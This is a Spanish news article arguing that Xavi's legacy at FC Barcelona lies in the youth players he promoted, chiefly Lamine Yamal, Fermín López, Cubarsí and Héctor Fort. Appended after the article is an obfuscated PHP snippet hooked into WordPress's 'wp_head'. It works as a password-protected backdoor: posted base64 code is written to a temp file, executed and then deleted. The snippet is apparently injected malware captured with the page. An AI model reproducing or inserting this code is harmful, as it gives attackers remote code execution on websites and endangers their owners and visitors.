Xavi sí deja legado

Cubarsí, Lamine o Fermín son jugadores estabilizados en el primer equipo con el técnico; y Fort formará parte de la primera plantilla la próxima temporada. Hizo debutar a 16 canteranos.

SEVILLE, SPAIN – MAY 26: Fermin Lopez of FC Barcelona celebrates after scoring the teams second goal with Xavi, Head Coach of FC Barcelona, during the LaLiga EA Sports match between Sevilla FC and FC Barcelona at Estadio Ramon Sanchez Pizjuan on May 26, 2024 in Seville, Spain. (Photo by Fran Santiago/Getty Images)

Xavi se va y, posiblemente, no haya evolucionado al equipo futbolísticamente como se esperaba y él mismo proclamó a su llegada en noviembre de 2021. “Me han apuntado y me han mirado con lupa; todo alrededor de mí lo han convertido en un terremoto”, dijo con razón en su última comparecencia de prensa en el Sánchez Pizjuán, pese a que fue él mismo quien generó expectativas que con el tiempo se revelaron exageradas.

El Barça de Xavi no alcanzó la excelencia futbolística y no ha ganado mucho (dos títulos de catorce posibles), pero sí deja legado: los jóvenes. Más allá de haber hecho debutar a 16 canteranos, algunos de los cuales han tenido un paso fugaz (Alarcón, Ilias, Jutglà, Álvaro Sanz, Mika Mármol, Estanis), otros han empezado a hacer carrera en otros clubes (Chadi Riad) y muchos aún tienen que encontrar hueco (Casadó, Aleix Garrido, Guiu), Xavi deja a cuatro futbolistas estabilizados en la primera plantilla.

El primero es aparecer fue Lamine Yamal quien, en una rareza que estará en todos los libros, debutó con quince años, nueve meses y seis días. Que Lamine debutaría algún día en el primer equipo parecía una evidencia. Tal vez, el gran mérito de Xavi haya estado en cómo ha gestionado su primer curso completo con el primer equipo con apenas 16 años. El chico criado en el barrio de Rocafonda ha jugado 50 partidos, pero sólo se ha estabilizado como titular indiscutible en los últimos meses, cuando estaba tirando la puerta de manera descarada. En el inicio de la competición, Xavi mezcló sus primeras titularidades con una etapa relativamente larga en el banquillo, que aprovechó para fortalecerse físicamente e intentar ir mejorando conceptos tácticos que ahora son más claros.

Fermín López no estaba ni en el mapa. Andaluz de El Campillo (Huelva), Xavi intuyó cosas interesantes en el centrocampista el verano pasado y se lo llevó a la gira por Estados Unidos. En Arlington le marcó un golazo con la izquierda al Madrid y saltó a primera plana. Pese a momentos sin protagonismo durante la temporada, ha demostrado ser el centrocampista con más llegada del Barça y ha descubierto un perfil nuevo dentro de La Masia, acostumbrada a producir jugadores de carácter más asociativo y menos llegador. Fermín ha marcado once goles en el curso de su debut. “Le estaré eternamente agradecido”, dijo después de dedicarle el último.

Cubarsí fue otro trueno durante la temporada. Acosado por las bajas en defensa, Xavi le dio la oportunidad en un partido de octavos de final de Copa del Rey en Salamanca; y, a sus 17 años, se quedó allí. El gran mérito de Xavi con Cubarsí no ha sido sólo apostar por él sino advertir al club de que ni se le ocurriese dejarlo escapar cuando recibió cantos de sirena de la Premier, Manchester City incluido. Xavi vigiló su evolución, estuvo a su lado y ha colaborado en su llegada a la élite. Cubarsí lo tiene todo para ser el central del futuro en el Barça. Es agresivo, lee bien el juego y tiene salida de balón, pero aún está verde y hay que vigilar con lupa su evolución porque la temporada se le ha terminado haciendo larga. Los tres, Lamine, Fermín y Cubarsí, han renovado su contrato con el Barça y son futuro para el club.

Pendiente de ampliar su contrato está aún Héctor Fort, que también formará parte de la primera plantilla la próxima temporada. Otro chaval jovencísimo que ha tenido menos continuidad porque Koundé y Cancelo lo han jugado casi todo, pero que ha competido con fiereza cuando se le ha dado la oportunidad y ha demostrado hambre y personalidad. Polivalente, con capacidad para jugar en todos los puestos de la defensa pero aún algo tierno en duelos, Fort tendrá la próxima temporada su gran desafío. Ahora sólo hay que ver si Fllick sigue mirando tanto a La Masia como su predecesor.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}